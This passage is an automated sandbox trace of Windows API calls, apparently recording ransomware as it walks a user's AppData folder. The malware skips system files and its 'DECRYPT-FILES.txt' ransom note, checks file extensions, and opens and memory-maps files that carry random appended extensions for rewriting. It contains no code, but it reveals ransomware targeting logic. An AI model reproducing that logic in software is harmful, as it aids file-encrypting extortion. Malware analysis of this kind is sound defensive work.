lpString2="dll") returned 1 [0184.630] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.630] lstrlenW (lpString="NdoDnsxj.bmp.MU3tDg") returned 19 [0184.630] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.630] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="NdoDnsxj.bmp.MU3tDg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp.MU3tDg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp.MU3tDg" [0184.630] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.630] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\NdoDnsxj.bmp.MU3tDg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ndodnsxj.bmp.mu3tdg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.630] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=60235) returned 1 [0184.630] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.630] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.631] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.631] CloseHandle (hObject=0x268) returned 1 [0184.631] CloseHandle (hObject=0x264) returned 1 [0184.631] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.632] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2ad089f0, ftCreationTime.dwHighDateTime=0x1d4cd73, ftLastAccessTime.dwLowDateTime=0x80030d90, ftLastAccessTime.dwHighDateTime=0x1d4d35d, ftLastWriteTime.dwLowDateTime=0xad41a0e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x9292, dwReserved0=0x0, dwReserved1=0x0, cFileName="Oprd.mp4.UYPzEm", cAlternateFileName="OPRDMP~1.UYP")) returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="DECRYPT-FILES.txt") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="autorun.inf") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="boot.ini") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="desktop.ini") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="ntuser.dat") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="iconcache.db") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="bootsect.bak") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="ntuser.dat.log") returned 1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="thumbs.db") returned -1 [0184.632] lstrcmpiW (lpString1="Oprd.mp4.UYPzEm", lpString2="Bootfont.bin") returned 1 [0184.632] lstrlenW (lpString="Oprd.mp4.UYPzEm") returned 15 [0184.632] lstrcmpiW (lpString1="UYPzEm", lpString2="lnk") returned 1 [0184.632] lstrcmpiW (lpString1="UYPzEm", lpString2="exe") returned 1 [0184.632] lstrcmpiW (lpString1="UYPzEm", lpString2="sys") returned 1 [0184.632] lstrcmpiW (lpString1="UYPzEm", lpString2="dll") returned 1 [0184.632] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.632] lstrlenW (lpString="Oprd.mp4.UYPzEm") returned 15 [0184.632] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.632] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Oprd.mp4.UYPzEm" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4.UYPzEm") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4.UYPzEm" [0184.632] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.632] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Oprd.mp4.UYPzEm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oprd.mp4.uypzem"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.633] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=37522) returned 1 [0184.633] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.633] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.633] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.633] CloseHandle (hObject=0x268) returned 1 [0184.634] CloseHandle (hObject=0x264) returned 1 [0184.634] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.634] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c86f160, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x73094240, ftLastAccessTime.dwHighDateTime=0x1d4d3f2, ftLastWriteTime.dwLowDateTime=0xad4663a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xacfa, dwReserved0=0x0, dwReserved1=0x0, cFileName="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", cAlternateFileName="OZB0SA~1.ON3")) returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="DECRYPT-FILES.txt") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="autorun.inf") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="boot.ini") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="desktop.ini") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="ntuser.dat") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="iconcache.db") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="bootsect.bak") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="ntuser.dat.log") returned 1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="thumbs.db") returned -1 [0184.634] lstrcmpiW (lpString1="OZb0saJ7yhNqb-p SoK.doc.ON38CyV", lpString2="Bootfont.bin") returned 1 [0184.634] lstrlenW (lpString="OZb0saJ7yhNqb-p SoK.doc.ON38CyV") returned 31 [0184.634] lstrcmpiW (lpString1="ON38CyV", lpString2="lnk") returned 1 [0184.634] lstrcmpiW (lpString1="ON38CyV", lpString2="exe") returned 1 [0184.634] lstrcmpiW (lpString1="ON38CyV", lpString2="sys") returned -1 [0184.634] lstrcmpiW (lpString1="ON38CyV", lpString2="dll") returned 1 [0184.634] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.634] lstrlenW (lpString="OZb0saJ7yhNqb-p SoK.doc.ON38CyV") returned 31 [0184.634] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.634] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="OZb0saJ7yhNqb-p SoK.doc.ON38CyV" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc.ON38CyV") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc.ON38CyV" [0184.635] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.635] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OZb0saJ7yhNqb-p SoK.doc.ON38CyV" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ozb0saj7yhnqb-p sok.doc.on38cyv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.635] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=44282) returned 1 [0184.635] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.635] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.636] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.636] CloseHandle (hObject=0x268) returned 1 [0184.636] CloseHandle (hObject=0x264) returned 1 [0184.636] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.636] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x39e97110, ftCreationTime.dwHighDateTime=0x1d4c551, ftLastAccessTime.dwLowDateTime=0xd0aa4aa0, ftLastAccessTime.dwHighDateTime=0x1d4cd3c, ftLastWriteTime.dwLowDateTime=0xad48c500, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x93fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeC6-0DE.swf.CkPJtV3", cAlternateFileName="PEC6-0~1.CKP")) returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="DECRYPT-FILES.txt") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="autorun.inf") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="boot.ini") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="desktop.ini") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="ntuser.dat") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="iconcache.db") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="bootsect.bak") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="ntuser.dat.log") returned 1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="thumbs.db") returned -1 [0184.636] lstrcmpiW (lpString1="PeC6-0DE.swf.CkPJtV3", lpString2="Bootfont.bin") returned 1 [0184.637] lstrlenW (lpString="PeC6-0DE.swf.CkPJtV3") returned 20 [0184.637] lstrcmpiW (lpString1="CkPJtV3", lpString2="lnk") returned -1 [0184.637] lstrcmpiW (lpString1="CkPJtV3", lpString2="exe") returned -1 [0184.637] lstrcmpiW (lpString1="CkPJtV3", lpString2="sys") returned -1 [0184.637] lstrcmpiW (lpString1="CkPJtV3", lpString2="dll") returned -1 [0184.637] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.637] lstrlenW (lpString="PeC6-0DE.swf.CkPJtV3") returned 20 [0184.637] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.637] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="PeC6-0DE.swf.CkPJtV3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf.CkPJtV3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf.CkPJtV3" [0184.637] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\PeC6-0DE.swf.CkPJtV3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\pec6-0de.swf.ckpjtv3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.637] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=37883) returned 1 [0184.637] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.637] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.638] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.638] CloseHandle (hObject=0x268) returned 1 [0184.638] CloseHandle (hObject=0x264) returned 1 [0184.638] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.638] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1741a3f0, ftCreationTime.dwHighDateTime=0x1d4cb35, ftLastAccessTime.dwLowDateTime=0x6038e5f0, ftLastAccessTime.dwHighDateTime=0x1d4c5ae, ftLastWriteTime.dwLowDateTime=0xad4d87c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x366a, dwReserved0=0x0, dwReserved1=0x0, cFileName="QD1ysnsO4kVGu.png.BAcx", cAlternateFileName="QD1YSN~1.BAC")) returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="DECRYPT-FILES.txt") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="autorun.inf") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="boot.ini") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="desktop.ini") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="ntuser.dat") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="iconcache.db") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="bootsect.bak") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="ntuser.dat.log") returned 1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="thumbs.db") returned -1 [0184.639] lstrcmpiW (lpString1="QD1ysnsO4kVGu.png.BAcx", lpString2="Bootfont.bin") returned 1 [0184.639] lstrlenW (lpString="QD1ysnsO4kVGu.png.BAcx") returned 22 [0184.639] lstrcmpiW (lpString1="BAcx", lpString2="lnk") returned -1 [0184.639] lstrcmpiW (lpString1="BAcx", lpString2="exe") returned -1 [0184.639] lstrcmpiW (lpString1="BAcx", lpString2="sys") returned -1 [0184.639] lstrcmpiW (lpString1="BAcx", lpString2="dll") returned -1 [0184.639] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.639] lstrlenW (lpString="QD1ysnsO4kVGu.png.BAcx") returned 22 [0184.639] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.639] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="QD1ysnsO4kVGu.png.BAcx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png.BAcx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png.BAcx" [0184.639] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.639] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QD1ysnsO4kVGu.png.BAcx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qd1ysnso4kvgu.png.bacx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.640] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=13930) returned 1 [0184.640] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.640] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.640] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.640] CloseHandle (hObject=0x268) returned 1 [0184.640] CloseHandle (hObject=0x264) returned 1 [0184.641] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.641] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99073520, ftCreationTime.dwHighDateTime=0x1d4cb22, ftLastAccessTime.dwLowDateTime=0x7088c80, ftLastAccessTime.dwHighDateTime=0x1d4c732, ftLastWriteTime.dwLowDateTime=0xad4fe920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10dee, dwReserved0=0x0, dwReserved1=0x0, cFileName="QWFtZKG5zhLN.swf.GWWdv", cAlternateFileName="QWFTZK~1.GWW")) returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="DECRYPT-FILES.txt") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="autorun.inf") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="boot.ini") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="desktop.ini") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="ntuser.dat") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="iconcache.db") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="bootsect.bak") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="ntuser.dat.log") returned 1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="thumbs.db") returned -1 [0184.641] lstrcmpiW (lpString1="QWFtZKG5zhLN.swf.GWWdv", lpString2="Bootfont.bin") returned 1 [0184.641] lstrlenW (lpString="QWFtZKG5zhLN.swf.GWWdv") returned 22 [0184.641] lstrcmpiW (lpString1="GWWdv", lpString2="lnk") returned -1 [0184.641] lstrcmpiW (lpString1="GWWdv", lpString2="exe") returned 1 [0184.641] lstrcmpiW (lpString1="GWWdv", lpString2="sys") returned -1 [0184.641] lstrcmpiW (lpString1="GWWdv", lpString2="dll") returned 1 [0184.641] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.641] lstrlenW (lpString="QWFtZKG5zhLN.swf.GWWdv") returned 22 [0184.641] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.641] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="QWFtZKG5zhLN.swf.GWWdv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf.GWWdv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf.GWWdv" [0184.641] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\QWFtZKG5zhLN.swf.GWWdv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\qwftzkg5zhln.swf.gwwdv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.642] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=69102) returned 1 [0184.642] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0184.642] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.643] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.643] CloseHandle (hObject=0x268) returned 1 [0184.643] CloseHandle (hObject=0x264) returned 1 [0184.643] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.643] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9f016e0, ftCreationTime.dwHighDateTime=0x1d4c6f5, ftLastAccessTime.dwLowDateTime=0xc33d4850, ftLastAccessTime.dwHighDateTime=0x1d4d088, ftLastWriteTime.dwLowDateTime=0xad524a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x8559, dwReserved0=0x0, dwReserved1=0x0, cFileName="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", cAlternateFileName="RA6YG2~1.14O")) returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="DECRYPT-FILES.txt") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="autorun.inf") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="boot.ini") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="desktop.ini") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="ntuser.dat") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="iconcache.db") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="bootsect.bak") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="ntuser.dat.log") returned 1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="thumbs.db") returned -1 [0184.643] lstrcmpiW (lpString1="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo", lpString2="Bootfont.bin") returned 1 [0184.643] lstrlenW (lpString="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo") returned 29 [0184.643] lstrcmpiW (lpString1="14oWJo", lpString2="lnk") returned -1 [0184.643] lstrcmpiW (lpString1="14oWJo", lpString2="exe") returned -1 [0184.643] lstrcmpiW (lpString1="14oWJo", lpString2="sys") returned -1 [0184.643] lstrcmpiW (lpString1="14oWJo", lpString2="dll") returned -1 [0184.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0184.643] lstrlenW (lpString="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo") returned 29 [0184.643] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0184.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo" [0184.643] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ra6Yg2CQeu7kE3KQ_0.mp3.14oWJo" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ra6yg2cqeu7ke3kq_0.mp3.14owjo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0184.644] GetFileSizeEx (in: hFile=0x264, 